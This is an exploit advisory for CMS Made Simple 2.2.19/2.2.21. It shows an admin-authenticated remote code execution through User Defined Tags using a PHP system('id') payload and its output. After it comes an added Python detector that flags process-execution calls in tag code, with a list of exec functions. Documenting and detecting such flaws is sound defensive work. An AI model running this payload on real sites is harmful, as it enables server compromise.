CMS Made Simple versions 2.2.19 and 2.2.21 suffer from a remote code execution vulnerability.
1fba8dc39f6eab628cec63c1efe79d88f846728e2cc5c0253884d3ade1777638
# Exploit Title: CMS Made Simple Version: 2.2.19/2.2.21 - Remote Code Execution
# Date: 2024-21-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cmsmadesimple.org/
# Version: 2.2.19/2.2.21
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple
1) Log in as admin and go to Extensions > User Defined Tags >
2) In the Code field, enter the payload: <?php echo system('id'); ?>
3) After clicking Run, you will see the result:
uid=1000(admin) gid=1000(admin) groups=1000(admin) uid=1000(admin) gid=1000(admin) groups=1000(admin)
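For defenders reviewing an installation, the following added example (not part of the original advisory) audits User Defined Tag code for PHP calls that start OS processes, such as the `system()` call in step 2. It assumes the tag code has already been exported as strings; the tag names and all sample bodies except the step 2 payload are constructed.

```python
import re

# PHP functions that start an OS process; PHP function names are case-insensitive.
EXEC_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen",
              "proc_open", "pcntl_exec"}

# Minimal PHP lexer: comments and quoted strings are consumed first so text
# inside them is never reported. Heredoc/nowdoc bodies are not handled.
TOKEN = re.compile(r"""
    (?P<comment>  //[^\n]* | \#[^\n]* | /\*.*?\*/ )
  | (?P<string>   '(?:\\.|[^'\\])*' | "(?:\\.|[^"\\])*" )
  | (?P<backtick> `(?:\\.|[^`\\])+` )
  | (?P<call>     (?P<prefix>->|::|\$)? \s* (?P<name>[A-Za-z_]\w*) \s* \( )
  | (?P<ident>    [A-Za-z_]\w* )
""", re.VERBOSE | re.DOTALL)


def find_exec_calls(code):
    """Return (line, name) for each direct process-execution call in PHP code."""
    findings = []
    for m in TOKEN.finditer(code):
        if m.group("backtick"):
            # Backticks are PHP's shell execution operator.
            line = code.count("\n", 0, m.start()) + 1
            findings.append((line, "backtick operator"))
        elif m.group("call") and not m.group("prefix"):
            # A prefix means a method, static or variable call, not the builtin.
            name = m.group("name").lower()
            if name in EXEC_FUNCS:
                line = code.count("\n", 0, m.start("name")) + 1
                findings.append((line, name))
    return findings


def audit(tags):
    """Map tag name -> findings, keeping only tags with at least one finding."""
    return {n: hits for n, c in tags.items() if (hits := find_exec_calls(c))}


# Constructed sample export: tag name -> tag code (names are hypothetical).
SAMPLE_TAGS = {
    "copyright_year": "echo date('Y');",
    "advisory_step_2": "<?php echo system('id'); ?>",
    "note_only": "// system('x') removed\necho 'system() is disabled';",
    "disk_report": "$out = Shell_Exec ('df -h');\necho $out;",
}

if __name__ == "__main__":
    for tag, hits in audit(SAMPLE_TAGS).items():
        print(tag, hits)
```

A tag with no findings is not proof that it is safe: this lexer skips heredocs and does not resolve variable function calls, so treat the output as a triage list for manual review.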